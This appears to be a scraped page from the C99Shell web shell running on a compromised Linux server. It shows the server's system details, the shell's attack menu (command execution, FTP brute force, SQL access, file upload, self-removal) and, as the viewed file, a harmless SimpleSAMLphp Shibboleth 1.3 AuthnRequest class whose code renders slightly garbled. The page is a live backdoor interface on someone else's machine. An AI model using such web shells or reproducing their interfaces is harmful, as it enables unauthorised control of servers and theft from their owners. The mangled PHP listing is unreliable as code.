!C99Shell v. 2.1 [PHP 8 Update] [02.02.2022]!

Software: Apache/2.4.53 (Unix) OpenSSL/1.1.1o PHP/7.4.29 mod_perl/2.0.12 Perl/v5.34.1. PHP/7.4.29 

uname -a: Linux vps-2738122-x 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64 

uid=1(daemon) gid=1(daemon) grupos=1(daemon) 

Safe-mode: OFF (not secure)

/opt/apex_led/php/3ros/simplesamlphp/lib/SimpleSAML/XML/Shib13/   drwxrwxr-x
Free 13.8 GB of 61.93 GB (22.29%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     AuthnRequest.php (1.4 KB)      -rwxrwxr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/**
 * The Shibboleth 1.3 Authentication Request. Not part of SAML 1.1, 
 * but an extension using query paramters no XML.
 *
 * @author Andreas Åkre Solberg, UNINETT AS. <andreas.solberg@uninett.no>
 * @package simpleSAMLphp
 * @version $Id: AuthnRequest.php 2070 2010-01-05 10:19:28Z olavmrk $
 */
class SimpleSAML_XML_Shib13_AuthnRequest {

    private 
$issuer null;
    private 
$relayState null;

    public function 
setRelayState($relayState) {
        
$this->relayState $relayState;
    }
    
    public function 
getRelayState() {
        return 
$this->relayState;
    }
    
    public function 
setIssuer($issuer) {
        
$this->issuer $issuer;
    }
    public function 
getIssuer() {
        return 
$this->issuer;
    }

    public function 
createRedirect($destination$shire NULL) {
        
$metadata SimpleSAML_Metadata_MetaDataStorageHandler::getMetadataHandler();
        
$idpmetadata $metadata->getMetaDataConfig($destination'shib13-idp-remote');

        if (
$shire === NULL) {
            
$shire $metadata->getGenerated('AssertionConsumerService''shib13-sp-hosted');
        }

        
$desturl $idpmetadata->getDefaultEndpoint('SingleSignOnService', array('urn:mace:shibboleth:1.0:profiles:AuthnRequest'));
        
$desturl $desturl['Location'];

        
$target $this->getRelayState();
        
        
$url $desturl '?' .
            
'providerId=' urlencode($this->getIssuer()) .
            
'&shire=' urlencode($shire) .
            (isset(
$target) ? '&target=' urlencode($target) : '');
        return 
$url;
    }

}

?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.1 [PHP 8 Update] [02.02.2022] maintained byC99Shell Github | Generation time: 0.4826 ]--